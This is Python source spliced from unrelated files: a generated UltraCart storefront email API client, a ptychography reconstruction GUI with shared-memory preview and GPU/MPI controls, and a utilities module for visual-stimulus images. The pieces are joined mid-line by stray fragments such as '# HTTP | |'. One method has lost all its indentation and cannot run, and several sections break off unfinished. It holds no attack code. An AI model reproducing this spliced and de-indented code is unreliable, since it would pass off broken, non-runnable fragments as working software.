    >>> thread = api.get_email_list_segment_folders_with_http_info(storefront_oid, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int storefront_oid: (required)
    :return: EmailListSegmentFoldersResponse
             If the method is called asynchronously,
             returns the request thread.
    :raises TypeError: if an unexpected keyword argument is supplied
    :raises ValueError: if `storefront_oid` is None
    """
    # The only keyword arguments this endpoint understands.
    all_params = ['storefront_oid', 'async_req', '_return_http_data_only',
                  '_preload_content', '_request_timeout']
    # Native dict iteration replaces the former six.iteritems()/locals()
    # introspection; six is unnecessary on Python 3 and locals() was fragile.
    for key in kwargs:
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_email_list_segment_folders" % key
            )
    # verify the required parameter 'storefront_oid' is set
    if storefront_oid is None:
        raise ValueError("Missing the required parameter `storefront_oid` when calling `get_email_list_segment_folders`")  # noqa: E501

    header_params = {
        # HTTP header `Accept`
        'Accept': self.api_client.select_header_accept(['application/json']),  # noqa: E501
        # HTTP header `Content-Type`
        'Content-Type': self.api_client.select_header_content_type(['application/json']),  # noqa: E501
    }
    # Authentication setting
    auth_settings = ['ultraCartBrowserApiKey', 'ultraCartOauth', 'ultraCartSimpleApiKey']  # noqa: E501
    return self.api_client.call_api(
        '/storefront/{storefront_oid}/email/list_segment_folders', 'GET',
        {'storefront_oid': storefront_oid},  # path params
        [],                                  # query params
        header_params,
        body=None,
        post_params=[],
        files=dict(),
        response_type='EmailListSegmentFoldersResponse',  # noqa: E501
        auth_settings=auth_settings,
        async_req=kwargs.get('async_req'),
        _return_http_data_only=kwargs.get('_return_http_data_only'),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout'),
        collection_formats={})
def get_email_lists(self, storefront_oid, **kwargs):  # noqa: E501
    """Get email lists # noqa: E501

    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True
    >>> thread = api.get_email_lists(storefront_oid, async_req=True)
    >>> result = thread.get()

    :param async_req bool
    :param int storefront_oid: (required)
    :return: EmailListsResponse
             If the method is called asynchronously,
             returns the request thread.
    """
    # Always unwrap the ApiResponse down to the deserialized data.
    kwargs['_return_http_data_only'] = True
    # The underlying call returns either the request thread (async) or the
    # data itself (sync); both are returned to the caller unchanged.
    response = self.get_email_lists_with_http_info(storefront_oid, **kwargs)  # noqa: E501
    return response
def get_email_lists_with_http_info(self, storefront_oid, **kwargs): # noqa: E501
"""Get email lists # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_email_lists_with_http_info(storefront_oid, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int storefront_oid: (required)
:return: EmailListsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['storefront_oid'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_email_lists" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'storefront_oid' is set
if ('storefront_oid' not in params or
params['storefront_oid'] is None):
raise ValueError("Missing the required parameter `storefront_oid` when calling `get_email_lists`") # noqa: E501
collection_formats = {}
path_params = {}
if 'storefront_oid' in params:
path_params['storefront_oid'] = params['storefront_oid'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP | |
# init reconStepWindow
if self.ck_preview_flag.isChecked():
if self.param.mode_flag:
info = (self.param.obj_mode_num, self.param.prb_mode_num, 1)
elif self.param.multislice_flag:
info = (self.param.slice_num, 1, 1)
else:
info = (1, 1, 2)
if self.reconStepWindow is None:
self.reconStepWindow = ReconStepWindow(*info)
self.reconStepWindow.reset_window(*info, iterations=self.param.n_iterations,
slider_interval=self.param.display_interval)
self.reconStepWindow.show()
else:
if self.reconStepWindow is not None:
# TODO: maybe a thorough cleanup???
self.reconStepWindow.close()
if not _TEST:
thread = self._ptycho_gpu_thread = PtychoReconWorker(self.param, parent=self)
else:
thread = self._ptycho_gpu_thread = PtychoReconFakeWorker(self.param, parent=self)
thread.update_signal.connect(self.update_recon_step)
thread.finished.connect(self.resetButtons)
if batch_mode:
thread.finished.connect(self._batch_manager)
#thread.finished.connect(self.reconStepWindow.debug)
thread.start()
self.btn_recon_stop.setEnabled(True)
self.btn_recon_start.setEnabled(False)
# init scan window
# TODO: optimize and refactor this part
if self.ck_scan_pt_flag.isChecked():
if self.scanWindow is None:
self.scanWindow = ScanWindow()
self.scanWindow.reset_window()
self.scanWindow.show()
else:
if self.scanWindow is not None:
self.scanWindow.close()
self.scanWindow = None
return
if self._scan_points is None:
raise RuntimeError("Scan points were not read. This shouldn't happen. Abort.")
else:
self._scan_points[0] *= -1.*self.param.x_direction
self._scan_points[1] *= self.param.y_direction
# borrowed from nsls2ptycho/core/ptycho_recon.py
if self.param.mpi_file_path == '':
if self.param.gpu_flag:
num_processes = str(len(self.param.gpus))
else:
num_processes = str(self.param.processes) if self.param.processes > 1 else str(1)
else:
# regardless if GPU is used or not --- trust users to know this
num_processes = str(get_mpi_num_processes(self.param.mpi_file_path))
self.scanWindow.update_image(self._scan_points, int(num_processes))
def stop(self, batch_mode=False):
    """Terminate the running reconstruction worker (if any) and reset the UI."""
    thread = self._ptycho_gpu_thread
    if thread is not None:
        if batch_mode:
            # in batch mode the chained-job callback must be detached first
            thread.finished.disconnect(self._batch_manager)
        if thread.isRunning():
            thread.kill()   # first kill the mpi processes
            thread.quit()   # then quit QThread gracefully
        self._ptycho_gpu_thread = None
    self.resetButtons()
    # clear any preview windows that are still open
    for window in (self.reconStepWindow, self.scanWindow):
        if window is not None:
            window.reset_window()
def init_mmap(self):
    """Attach to the shared-memory segments published by the reconstruction
    backend and expose the per-iteration probe/object stacks as zero-copy
    NumPy views in self._prb and self._obj.
    """
    p = self.param
    # bytes per complex element: 8 for complex64, 16 for complex128
    # NOTE(review): datasize is computed but never used in this method -- confirm
    datasize = 8 if p.precision == 'single' else 16
    datatype = np.complex64 if p.precision == 'single' else np.complex128
    global mm_list, shm_list
    # three POSIX shared-memory segments: object-size header, probe, object
    for i, name in enumerate(["/"+p.shm_name+"_obj_size", "/"+p.shm_name+"_prb", "/"+p.shm_name+"_obj"]):
        shm_list.append(SharedMemory(name))
        mm_list.append(mmap.mmap(shm_list[i].fd, shm_list[i].size))
    # the header segment holds two consecutive big-endian 8-byte integers
    nx_obj = int.from_bytes(mm_list[0].read(8), byteorder='big')
    ny_obj = int.from_bytes(mm_list[0].read(8), byteorder='big') # the file position has been moved by 8 bytes when we get nx_obj
    if p.mode_flag:
        # multi-mode: one probe/object stack per mode
        self._prb = np.ndarray(shape=(p.n_iterations, p.prb_mode_num, p.nx, p.ny), dtype=datatype, buffer=mm_list[1], order='C')
        self._obj = np.ndarray(shape=(p.n_iterations, p.obj_mode_num, nx_obj, ny_obj), dtype=datatype, buffer=mm_list[2], order='C')
    elif p.multislice_flag:
        # multi-slice: single probe, one object per slice
        self._prb = np.ndarray(shape=(p.n_iterations, 1, p.nx, p.ny), dtype=datatype, buffer=mm_list[1], order='C')
        self._obj = np.ndarray(shape=(p.n_iterations, p.slice_num, nx_obj, ny_obj), dtype=datatype, buffer=mm_list[2], order='C')
    else:
        # plain single-mode, single-slice reconstruction
        self._prb = np.ndarray(shape=(p.n_iterations, 1, p.nx, p.ny), dtype=datatype, buffer=mm_list[1], order='C')
        self._obj = np.ndarray(shape=(p.n_iterations, 1, nx_obj, ny_obj), dtype=datatype, buffer=mm_list[2], order='C')
def close_mmap(self):
    """Detach from and unlink the shared-memory segments used for previews.

    Safe to call whether or not init_mmap() ever ran in this process.
    """
    # We close shared memory as long as the backend is terminated either normally or
    # abnormally. The subtlety here is that the monitor should still be able to access
    # the intermediate results after mmaps' are closed. A potential segfault is avoided
    # by accessing the transformed results, which are buffered, not the original ones.
    try:
        global mm_list, shm_list
        for mm, shm in zip(mm_list, shm_list):
            mm.close()
            shm.close_fd()
            shm.unlink()
        mm_list = []
        shm_list = []
    except NameError:
        # either not using GUI, monitor is turned off, global variables are deleted or not yet created!
        # need to examine the last case
        try:
            # best-effort unlink by name in case the globals never existed
            SharedMemory("/"+self.param.shm_name+"_obj_size").unlink()
            SharedMemory("/"+self.param.shm_name+"_prb").unlink()
            SharedMemory("/"+self.param.shm_name+"_obj").unlink()
        except ExistentialError:
            pass # nothing to clean up, we're done
def update_recon_step(self, it, data=None):
    """Qt slot: receive per-iteration progress from the reconstruction worker.

    `it` is the iteration number, with two sentinel values:
    it == -1 with data == 'init_mmap' attaches the shared-memory buffers, and
    it == n_iterations + 1 loads the post-processed results from disk into
    the preview window.
    """
    self.recon_bar.setValue(it)
    if self.reconStepWindow is not None:
        self.reconStepWindow.update_iter(it)
        if not _TEST and self.ck_preview_flag.isChecked():
            try:
                if it == -1 and data == 'init_mmap':
                    try:
                        # the two npy are created by ptycho by this time
                        self.init_mmap()
                    except ExistentialError:
                        # user may kill the process prematurely
                        self.stop()
                elif it == self.param.n_iterations+1:
                    # reserve it=n_iterations+1 as the working space
                    self.reconStepWindow.current_max_iters = self.param.n_iterations
                    p = self.param
                    if not p.postprocessing_flag:
                        return
                    work_dir = p.working_directory
                    scan_num = str(p.scan_num)
                    data_dir = work_dir+'/recon_result/S'+scan_num+'/'+p.sign+'/recon_data/'
                    data = {}
                    images = []
                    print("[SUCCESS] generated results are loaded in the preview window. ", end='', file=sys.stderr)
                    print("Slide to frame "+str(p.n_iterations+1)+" and select from drop-down menus.", file=sys.stderr)
                    if self.param.mode_flag:
                        # load data that has been averaged + orthonormalized + phase-ramp removed
                        for i in range(self.param.obj_mode_num):
                            data['obj_'+str(i)] = np.load(data_dir+'recon_'+scan_num+'_'+p.sign+'_' \
                                                          +'object_mode_orth_ave_rp_mode_'+str(i)+'.npy')
                            self.reconStepWindow.cb_image_object.addItem("Object "+str(i)+" (orth_ave_rp)")
                            # hard-wire the padding values here...
                            images.append( np.rot90(np.angle(data['obj_'+str(i)][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
                            images.append( np.rot90(np.abs(data['obj_'+str(i)][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
                        for i in range(self.param.prb_mode_num):
                            data['prb_'+str(i)] = np.load(data_dir+'recon_'+scan_num+'_'+p.sign+'_' \
                                                          +'probe_mode_orth_ave_rp_mode_'+str(i)+'.npy')
                            self.reconStepWindow.cb_image_probe.addItem("Probe "+str(i)+" (orth_ave_rp)")
                            images.append( np.rot90(np.abs(data['prb_'+str(i)])) )
                            images.append( np.rot90(np.angle(data['prb_'+str(i)])) )
                    elif self.param.multislice_flag:
                        # load data that has been averaged + phase-ramp removed
                        for i in range(self.param.slice_num):
                            data['obj_'+str(i)] = np.load(data_dir+'recon_'+scan_num+'_'+p.sign+'_' \
                                                          +'object_ave_rp_ms_'+str(i)+'.npy')
                            self.reconStepWindow.cb_image_object.addItem("Object "+str(i)+" (ave_rp)")
                            # hard-wire the padding values here...
                            images.append( np.rot90(np.angle(data['obj_'+str(i)][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
                            images.append( np.rot90(np.abs(data['obj_'+str(i)][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
                        for i in range(self.param.slice_num):
                            data['prb_'+str(i)] = np.load(data_dir+'recon_'+scan_num+'_'+p.sign+'_' \
                                                          +'probe_ave_rp_ms_'+str(i)+'.npy')
                            self.reconStepWindow.cb_image_probe.addItem("Probe "+str(i)+" (ave_rp)")
                            images.append( np.rot90(np.abs(data['prb_'+str(i)])) )
                            images.append( np.rot90(np.angle(data['prb_'+str(i)])) )
                    else:
                        # load data (ave & ave_rp)
                        for sol in ['ave', 'ave_rp']:
                            for tar, target in zip(['obj', 'prb'], ['object', 'probe']):
                                data[tar+'_'+sol] = np.load(data_dir+'recon_'+scan_num+'_'+p.sign+'_'+target+'_'+sol+'.npy')
                        # calculate images
                        for sol in ['ave', 'ave_rp']:
                            self.reconStepWindow.cb_image_object.addItem("Object ("+sol+")")
                            # hard-wire the padding values here...
                            images.append( np.rot90(np.angle(data['obj_'+sol][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
                            images.append( np.rot90(np.abs(data['obj_'+sol][(p.nx+30)//2:-(p.nx+30)//2, (p.ny+30)//2:-(p.ny+30)//2])) )
                        for sol in ['ave', 'ave_rp']:
                            self.reconStepWindow.cb_image_probe.addItem("Probe ("+sol+")")
                            images.append( np.rot90(np.abs(data['prb_'+sol])) )
                            images.append( np.rot90(np.angle(data['prb_'+sol])) )
                    self.reconStepWindow.update_images(it, images)
                elif (it-1) % self.param.display_interval == 0:
                    # ordinary preview frame: pull the iteration slice out of
                    # the shared-memory views created by init_mmap()
                    if self.param.mode_flag:
                        images = []
                        for i in range(self.param.obj_mode_num):
                            images.append(np.rot90(np.angle(self._obj[it-1, i])))
                            images.append(np.rot90(np.abs(self._obj[it-1, i])))
                        for i in range(self.param.prb_mode_num):
                            images.append(np.rot90(np.abs(self._prb[it-1, i])))
                            images.append(np.rot90(np.angle(self._prb[it-1, i])))
                    elif self.param.multislice_flag:
                        images = []
                        for i in range(self.param.slice_num):
                            images.append(np.rot90(np.angle(self._obj[it-1, i])))
                            images.append(np.rot90(np.abs(self._obj[it-1, i])))
                        #TODO: decide which probe we'd like to present
                        images.append(np.rot90(np.abs(self._prb[it-1, 0])))
                        images.append(np.rot90(np.angle(self._prb[it-1, 0])))
                    else:
                        images = [np.rot90(np.angle(self._obj[it-1, 0])),
                                  np.rot90(np.abs(self._obj[it-1, 0] )),
                                  np.rot90(np.abs(self._prb[it-1, 0] )),
                                  np.rot90(np.angle(self._prb[it-1, 0]))]
                    self.reconStepWindow.update_images(it, images)
                    self.reconStepWindow.update_metric(it, data)
            except TypeError as ex: # when MPI processes are terminated, _prb and _obj are deleted and so not subscriptable
                pass
        else:
            # -------------------- Sungsoo version -------------------------------------
            # a list of random images for test
            # in the order of [object_amplitude, object_phase, probe_amplitude, probe_phase]
            images = [np.random.random((128,128)) for _ in range(4)]
            self.reconStepWindow.update_images(it, images)
            self.reconStepWindow.update_metric(it, data)
def loadProbe(self):
    """Let the user pick a probe .npy file; disables 'estimate from data'."""
    filename, _ = QFileDialog.getOpenFileName(self, 'Open probe file', directory=self.param.working_directory, filter="(*.npy)")
    if filename is None or len(filename) == 0:
        return
    # split the selection into directory + basename for the param record
    prb_filename = os.path.basename(filename)
    prb_dir = filename[:len(filename) - len(prb_filename)]
    self.param.set_prb_path(prb_dir, prb_filename)
    self.le_prb_path.setText(prb_filename)
    # a user-supplied probe overrides 'estimate from data'
    self.ck_init_prb_flag.setChecked(False)
def resetProbeFlg(self):
    """Revert to estimating the initial probe from data (forget any file)."""
    # called when "estimate from data" is clicked
    self.param.set_prb_path('', '')
    self.le_prb_path.setText('')
    # tick the flag so the backend generates its own initial probe
    self.ck_init_prb_flag.setChecked(True)
def loadObject(self):
    """Let the user pick an object .npy file; disables 'random start'."""
    filename, _ = QFileDialog.getOpenFileName(self, 'Open object file', directory=self.param.working_directory, filter="(*.npy)")
    if filename is None or len(filename) == 0:
        return
    # split the selection into directory + basename for the param record
    obj_filename = os.path.basename(filename)
    obj_dir = filename[:len(filename) - len(obj_filename)]
    self.param.set_obj_path(obj_dir, obj_filename)
    self.le_obj_path.setText(obj_filename)
    # a user-supplied object overrides 'random start'
    self.ck_init_obj_flag.setChecked(False)
def resetObjectFlg(self):
    """Revert to a random initial object (forget any loaded file)."""
    # called when "random start" is clicked
    self.param.set_obj_path('', '')
    self.le_obj_path.setText('')
    # tick the flag so the backend generates its own initial object
    self.ck_init_obj_flag.setChecked(True)
def setWorkingDirectory(self):
    """Ask for a working folder and store it (with trailing slash) in param."""
    dirname = QFileDialog.getExistingDirectory(self, 'Choose working folder', directory=os.path.expanduser("~"))
    if dirname is None or len(dirname) == 0:
        return
    # downstream path concatenation expects a trailing separator
    dirname = dirname + "/"
    self.param.set_working_directory(dirname)
    self.le_working_directory.setText(dirname)
def updateExtraScansFlg(self):
    """Enable the scan-list button only while 'extra scans' is ticked."""
    enabled = self.ck_extra_scans_flag.isChecked()
    self.btn_set_extra_scans.setEnabled(enabled)
def setExtraScans(self):
    """Show (lazily creating) the dialog listing associated scan numbers."""
    dialog = self._extra_scans_dialog
    if dialog is None:
        dialog = ListWidget()
        dialog.setWindowTitle('Set associated scan numbers')
        # read from param if there are any asso scans leftover from last time
        leftover = self.param.asso_scan_numbers
        if len(leftover) > 0:
            dialog.listWidget.addItems([str(item) for item in leftover])
        self._extra_scans_dialog = dialog
    dialog.show()
def modeMultiSliceGuard(self):
    '''
    Currently our ptycho code does not support simultaneous mode + multi-slice reconstruction.
    This function can be removed once the support is added.
    '''
    # guard clause: only intervene when BOTH boxes are ticked at once
    if not (self.ck_mode_flag.isChecked() and self.ck_multislice_flag.isChecked()):
        return
    message = "Currently our ptycho code does not support simultaneous multi-mode + multi-slice reconstruction."
    print("[WARNING] " + message, file=sys.stderr)
    QtWidgets.QMessageBox.warning(self, "Warning", message)
    # untick both and propagate the change to the dependent widgets
    self.ck_mode_flag.setChecked(False)
    self.ck_multislice_flag.setChecked(False)
    self.updateModeFlg()
    self.updateMultiSliceFlg()
def updateModeFlg(self):
    """Sync the multi-mode spin boxes and param with the mode checkbox."""
    flag = self.ck_mode_flag.isChecked()
    # the mode-count spin boxes only make sense in multi-mode reconstruction
    for spinbox in (self.sp_prb_mode_num, self.sp_obj_mode_num):
        spinbox.setEnabled(flag)
    self.param.mode_flag = flag
def updateMultiSliceFlg(self):
    """Sync the multi-slice widgets and param with the multislice checkbox."""
    enabled = self.ck_multislice_flag.isChecked()
    # slice count and spacing are only meaningful in multi-slice mode
    for widget in (self.sp_slice_num, self.sp_slice_spacing_m):
        widget.setEnabled(enabled)
    self.param.multislice_flag = enabled
def updateObjMaskFlg(self):
    """Toggle the amplitude/phase mask-range inputs with the mask checkbox."""
    masked = self.ck_mask_obj_flag.isChecked()
    # all four range bounds follow the single mask flag
    for spinbox in (self.sp_amp_min, self.sp_amp_max,
                    self.sp_pha_min, self.sp_pha_max):
        spinbox.setEnabled(masked)
    self.param.mask_obj_flag = masked
def checkGpuAvail(self):
    """Probe for CuPy; grey out every GPU control when it is unavailable."""
    try:
        import cupy
    except ImportError:
        cupy = None
    if cupy is not None:
        # CuPy imported fine -- nothing to disable; drop the module reference
        del cupy
        return
    print('[!] Unable to import CuPy. GPU reconstruction is disabled.')
    print('[!] (Either CuPy is not installed, or GPU is not available.)')
    self.ck_gpu_flag.setChecked(False)
    self.ck_gpu_flag.setEnabled(False)
    self.param.gpu_flag = False
    self.le_gpus.setText('')
    self.le_gpus.setEnabled(False)
    self.cb_gpu_batch_size.setEnabled(False)
def updateGpuFlg(self):
    """Toggle GPU-only widgets; fall back to MPI when GPU (NCCL) is off."""
    use_gpu = self.ck_gpu_flag.isChecked()
    self.le_gpus.setEnabled(use_gpu)
    self.rb_nccl.setEnabled(use_gpu)
    # NCCL requires GPUs, so a selected NCCL backend reverts to MPI
    if not use_gpu and self.rb_nccl.isChecked():
        self.rb_mpi.setChecked(True)
def updateBraggFlg(self):
    """Toggle the Bragg-angle inputs with the Bragg-mode checkbox."""
    on = self.ck_bragg_flag.isChecked()
    # the three geometry angles are only used in Bragg mode
    for spinbox in (self.sp_bragg_theta, self.sp_bragg_gamma, self.sp_bragg_delta):
        spinbox.setEnabled(on)
    self.param.bragg_flag = on
def updatePcFlg(self):
    """Toggle the pc_* controls (sigma, kernel size, algorithm) with the pc checkbox."""
    on = self.ck_pc_flag.isChecked()
    for widget in (self.sp_pc_sigma, self.sp_pc_kernel_n, self.cb_pc_alg):
        widget.setEnabled(on)
    self.param.pc_flag = on
def updateCorrFlg(self):
    """Toggle the position-correction inputs with their checkbox."""
    on = self.ck_position_correction_flag.isChecked()
    for spinbox in (self.sp_position_correction_start, self.sp_position_correction_step):
        spinbox.setEnabled(on)
    self.param.position_correction_flag = on
def updateRefineDataFlg(self):
    """Toggle the data-refinement inputs with their checkbox."""
    on = self.ck_refine_data_flag.isChecked()
    for spinbox in (self.sp_refine_data_start_it,
                    self.sp_refine_data_interval,
                    self.sp_refine_data_step):
        spinbox.setEnabled(on)
    self.param.refine_data_flag = on
def updateBatchCropDataFlg(self):
    """Enable the batch-crop controls only for the databroker data loader."""
    from_databroker = self.cb_dataloader.currentText() == "Load from databroker"
    if from_databroker:
        flag = self.ck_batch_crop_flag.isChecked()
        self.ck_batch_crop_flag.setEnabled(True)
    else:
        # cropping only applies to databroker data; force it off otherwise
        flag = False
        self.ck_batch_crop_flag.setChecked(False)
        self.ck_batch_crop_flag.setEnabled(False)
    for spinbox in (self.sp_batch_x0, self.sp_batch_y0,
                    self.sp_batch_width, self.sp_batch_height):
        spinbox.setEnabled(flag)
def showNoPostProcessingWarning(self):
    """Warn on stderr when post-processing (result writing) is disabled."""
    if self.ck_postprocessing_flag.isChecked():
        return
    print("[WARNING] Post-processing is turned off. No result will be written to disk!", file=sys.stderr)
def clearSharedMemory(self):
message = "Are you sure you want to clear the shared memory segments currently left in /dev/shm? "\
"The safest way to do so is to ensure you have only one window (that is, this one) opened on this machine."
ans | |
# sfp/utils.py
#!/usr/bin/python
"""various utils
"""
import os
import numpy as np
import matplotlib.pyplot as plt
import scipy as sp
from . import stimuli as sfp_stimuli
from bids import BIDSLayout
import pandas as pd
from . import first_level_analysis
from . import tuning_curves
import warnings
from . import plotting
def bytescale(data, cmin=None, cmax=None, high=255, low=0):
    """
    Byte scale an array (image): convert to uint8, linearly mapping the
    value range onto ``(low, high)`` (default 0-255).

    If the input already has dtype uint8 it is returned unchanged.
    This is copied from scipy.misc, where it is deprecated.

    Parameters
    ----------
    data : ndarray
        PIL image data array.
    cmin : scalar, optional
        Bias scaling of small values. Default is ``data.min()``.
    cmax : scalar, optional
        Bias scaling of large values. Default is ``data.max()``.
    high : scalar, optional
        Scale max value to `high`. Default is 255.
    low : scalar, optional
        Scale min value to `low`. Default is 0.

    Returns
    -------
    img_array : uint8 ndarray
        The byte-scaled array.

    Examples
    --------
    >>> import numpy as np
    >>> from sfp.utils import bytescale
    >>> img = np.array([[ 91.06794177,   3.39058326,  84.4221549 ],
    ...                 [ 73.88003259,  80.91433048,   4.88878881],
    ...                 [ 51.53875334,  34.45808177,  27.5873488 ]])
    >>> bytescale(img)
    array([[255,   0, 236],
           [205, 225,   4],
           [140,  90,  70]], dtype=uint8)
    >>> bytescale(img, high=200, low=100)
    array([[200, 100, 192],
           [180, 188, 102],
           [155, 135, 128]], dtype=uint8)
    >>> bytescale(img, cmin=0, cmax=255)
    array([[91,  3, 84],
           [74, 81,  5],
           [52, 34, 28]], dtype=uint8)
    """
    # already byte data: nothing to do
    if data.dtype == np.uint8:
        return data
    # validate the requested output range
    if high > 255:
        raise ValueError("`high` should be less than or equal to 255.")
    if low < 0:
        raise ValueError("`low` should be greater than or equal to 0.")
    if high < low:
        raise ValueError("`high` should be greater than or equal to `low`.")
    # default the input range to the data's own extremes
    cmin = data.min() if cmin is None else cmin
    cmax = data.max() if cmax is None else cmax
    crange = cmax - cmin
    if crange < 0:
        raise ValueError("`cmax` should be larger than `cmin`.")
    elif crange == 0:
        # constant input: avoid division by zero, everything maps to `low`
        crange = 1
    scale = float(high - low) / crange
    scaled = (data - cmin) * scale + low
    # +0.5 rounds to nearest before the uint8 truncation
    return (scaled.clip(low, high) + 0.5).astype(np.uint8)
def scatter_heat(x, y, c, **kwargs):
    """Scatter x against y, coloring points by c on a zero-centered diverging map.

    kwargs must contain 'vmin' and 'vmax'; other entries are ignored.
    """
    norm = plotting.MidpointNormalize(midpoint=0)
    plt.scatter(x, y, c=c, s=50, cmap='RdBu_r', norm=norm,
                vmin=kwargs['vmin'], vmax=kwargs['vmax'])
def create_sin_cpp(size, w_x, w_y, phase=0, origin=None):
    """Create a full 2d sine wave, with frequencies (w_x, w_y) in cycles / pixel.

    `origin` defaults to the image center; the wave is evaluated on a
    size-by-size pixel grid indexed from 1.
    """
    if origin is None:
        center = (size + 1) / 2.
        origin = [center, center]
    coords = np.arange(1, size + 1)
    x, y = np.meshgrid(coords - origin[0], coords - origin[1])
    return np.cos(2*np.pi*x*w_x + 2*np.pi*y*w_y + phase)
def create_sin_cpd(size, w_x_cpd, w_y_cpd, phase=0, stim_rad_deg=12):
    """Create a full 2d sine wave, with frequencies in cycles / degree.

    The cycles/degree frequencies are converted to cycles/pixel using
    stim_rad_deg, the radius of the image in degrees of visual angle.
    """
    # pixels per degree of visual angle for a size-wide image
    pix_per_deg = size / (2 * float(stim_rad_deg))
    w_x_pix = w_x_cpd / pix_per_deg
    w_y_pix = w_y_cpd / pix_per_deg
    return create_sin_cpp(size, w_x_pix, w_y_pix, phase)
def create_circle_mask(x, y, rad, size):
    """Create a circular mask.

    Returns a size-by-size float array that is 1 inside the circle of radius
    `rad` centered at pixel (x, y) and 0 outside; multiply it by a same-size
    image to mask everything else out.
    """
    coords = np.arange(size)
    x_grid, y_grid = np.meshgrid(coords, coords)
    inside = (x_grid - x)**2 + (y_grid - y)**2 <= rad**2
    return inside.astype(float)
def create_ecc_mask(ecc_range, size, max_visual_angle):
    """Create mask selecting range of eccentricities.

    Note this only works for square images.

    Parameters
    ----------
    ecc_range : tuple
        2-tuple of floats specifying the eccentricity of the internal and
        external edges (in that order) of this mask, in degrees.
    size : int
        Height/width of the mask, in pixels.
    max_visual_angle : float
        Height/width of the mask, in degrees.

    Returns
    -------
    mask : np.ndarray
        2d boolean array containing the mask for this eccentricity range.

    Raises
    ------
    ValueError
        If ecc_range is not strictly increasing.
    """
    if ecc_range[0] >= ecc_range[1]:
        # ValueError (a subclass of Exception, so existing handlers still work)
        # replaces the former bare Exception for a more precise error type
        raise ValueError("ecc_range[1] must be strictly greater than ecc_range[0]!")
    # pixels per degree, used to convert the eccentricity bounds to radii
    ppd = float(size) / max_visual_angle
    origin = ((size+1) / 2., (size+1) / 2.)
    min_mask = create_circle_mask(*origin, ecc_range[0]*ppd, size)
    max_mask = create_circle_mask(*origin, ecc_range[1]*ppd, size)
    # keep pixels inside the outer circle but outside the inner one
    return np.logical_and(max_mask.astype(bool), ~min_mask.astype(bool))
def create_prf_loc_map(size=1080, max_visual_angle=24, origin=None):
    """Create map of pRF locations.

    Default parameters are for the set up used in this experiment.

    Parameters
    ----------
    size : int, optional
        Size of the arrays, in pixels. Returned arrays will be 2d, with this
        number of pixels on each dimension.
    max_visual_angle : float, optional
        Diameter of the array, in degrees.
        NOTE(review): this argument is currently unused in the computation --
        eccentricity is returned in pixels, not degrees; confirm intent.
    origin : tuple or None, optional
        The location of the origin of the image. If None, will place in the
        center.

    Returns
    -------
    eccen, angle : np.ndarray
        The eccentricity and polar angle, at each pixel.
    """
    assert not hasattr(size, '__iter__'), "Only square images permitted, size must be a scalar!"
    size = int(size)
    if origin is None:
        center = (size + 1) / 2.
        origin = (center, center)
    coords = np.arange(1, size + 1)
    x, y = np.meshgrid(coords - origin[0], coords - origin[1])
    eccen = np.sqrt(x**2 + y**2)
    # wrap arctan2's (-pi, pi] output into [0, 2*pi)
    angle = np.mod(np.arctan2(y, x), 2*np.pi)
    return eccen, angle
def mask_array_like_grating(masked, array_to_mask, mid_val=128, val_to_set=0):
    """mask array_to_mask the way that masked has been masked

    this takes two square arrays, grating and array_to_mask. masked should already be masked into
    an annulus, while array_to_mask should be unmasked. This then finds the inner and outer radii
    of that annulus and applies the same mask to array_to_mask. the value in the masked part of
    masked should be mid_val (by default, 128, as you'd get when the grating runs from 0 to 255;
    mid_val=0, with the grating going from -1 to 1 is also likely) and the value that you want to
    set array_to_mask to is val_to_set (same reasonable values as mid_val)
    """
    # radial coordinate maps for both arrays, normalized by image width
    R = sfp_stimuli.mkR(masked.shape) / float(masked.shape[0])
    R_masking = sfp_stimuli.mkR(array_to_mask.shape) / float(array_to_mask.shape[0])
    # pixels that survived the annulus mask (anything not equal to the fill value)
    x, y = np.where(masked != mid_val)
    Rmin = R[x, y].min()
    try:
        # fill everything inside the annulus' inner radius
        array_to_mask[R_masking < Rmin] = val_to_set
    except IndexError:
        # then there is no R<Rmin
        # NOTE(review): boolean-mask assignment does not raise IndexError for an
        # empty selection, so this guard looks vestigial -- confirm
        pass
    Rmax = R[x, y].max()
    try:
        # fill everything outside the annulus' outer radius
        array_to_mask[R_masking > Rmax] = val_to_set
    except IndexError:
        # then there is no R>Rmax
        pass
    return array_to_mask
def flat_hyperbola(x, a, b=1.):
    """Hyperbola 1 / (a*x) which is flat (constant) below x = b.

    Parameters
    ----------
    x : np.ndarray
        Input values (e.g. eccentricity in degrees).
    a : float
        Slope of the period, period = a * x.
    b : float, optional
        Flattening point; for x < b the period is clamped to a*b.
        Defaults to 1 (degree), matching the previous hard-coded behavior.

    Returns
    -------
    np.ndarray
        1 / period at each x.
    """
    # period grows linearly with x but is clamped below the flattening point
    period = x*a
    period[x < b] = a*b
    return 1./period
def fit_log_norm(x, y, **kwargs):
    """fit log norm to data and plot the result

    to be used with seaborn.FacetGrid.map_dataframe

    x: string, column in data which contains the x values for this plot.
    y: string, column in data which contains the y values for this plot.
    kwargs must contain `data`, the DataFrame with data to plot.
    """
    data = kwargs.pop('data')
    # average the y values within each x bin before fitting
    plot_data = data.groupby(x)[y].mean()
    try:
        popt, pcov = sp.optimize.curve_fit(tuning_curves.log_norm_pdf, plot_data.index,
                                           plot_data.values)
    except RuntimeError:
